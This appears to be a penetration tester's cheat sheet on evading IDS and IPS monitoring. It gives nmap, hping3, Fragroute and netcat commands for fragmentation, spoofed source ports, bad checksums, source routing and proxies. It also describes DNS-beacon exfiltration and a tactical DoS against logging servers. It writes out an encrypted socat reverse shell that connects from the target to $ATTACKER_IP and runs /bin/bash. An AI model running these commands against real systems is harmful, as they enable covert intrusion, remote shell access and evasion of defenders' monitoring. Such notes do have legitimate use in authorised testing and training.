# IDS & IPS Evation

* Evation by manipulation of 
    * Protocol
    * Payload
    * Route
    * Or DoS

## Protocol Manipulation

### Relying on another protocol
* `nc -ulvnp 4711` for listening to incoming UDP traffic
* `nc -u $TARGET_IP $TARGET_PORT` for connecting through UDP

### Manipulation of the source's or LHOST's network port
* `nmap -g 80` or `nmap --source-port 53` to send outgoing nmap traffic through it

### Session splicing by fragmentation and segmentation
* `nmap` fragmentation in 8 bytes `-f`, 16 bytes `-ff`, `--mtu <size>` for MTU  
* Use [Fragroute](https://www.monkey.org/~dugsong/fragroute/) with `ip_frag <num>` in `fragroute.conf`, then use `fragroute -f fragroute.conf $TARGET_IP`

### Sending invalid packets
* Invalid protocol header flags and checksums via`nmap --badsum`, `nmap --scanflags URG/ACK/PSH/RST/SYN/FIN`, e.g. concatentation of multiple flags `nmap --scanflags SYNRSTFIN`
* `hping3` including `--ttl`, `--badsum`, header flags `-S`,`-A`,`-P`,`-U`,`-F`,`-R`

## Payload Manipulation

### Obfuscation and Encoding
* Base64 
* URL
* Escaped Unicode Characters

### Encrypting Communication Channels
* Use socat with encryption 
```sh
openssl req -x509 -newkey rsa:2048 -days 356 -subj '/CN=www.example.com/O=YO/C=FR' -nodes -keyout id_rsa.key -out reverse.crt
```
* Create `.pem` (Privacy Enhanced Mail) file via
```
cat id_rsa.key reverse.crt > reverse.pem
```
* Listening on attacker side
```sh
socat -d -d OPENSSL-LISTEN:4711,cert=reverse.pem,verify=0,fork STDOUT
```
* On target 
```sh
socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash
```

### Modification of Data
* Order of parameters, instead of `nc -lvnp` it is `nc -vpnl`
* Adding whitespaces to the commands
* Use aliases

## Route Manipulation

### Relying on Source Routing
* `nmap --ip-options "L 10.10.20.30 10.10.30.40` routes through these IPs loosely
* `nmap --ip-options "S 10.10.20.30 10.10.30.40"` routes through the IPs strictly

### Using Proxyy Servers
* `nmap -sS http://$PROXY1:80,socks4://$PROXY:8080 $TARGET_IP`

## Tactical DoS
* Non malicious, benign traffic against 
    * IDS/IPS
    * Logging server

## MISC

* Changing 
    * `User-Agent`
    * Request frequency and duration of sleep 
    * SSL/TLS certs
    * DNS beacon, storing exfiltrated data in the query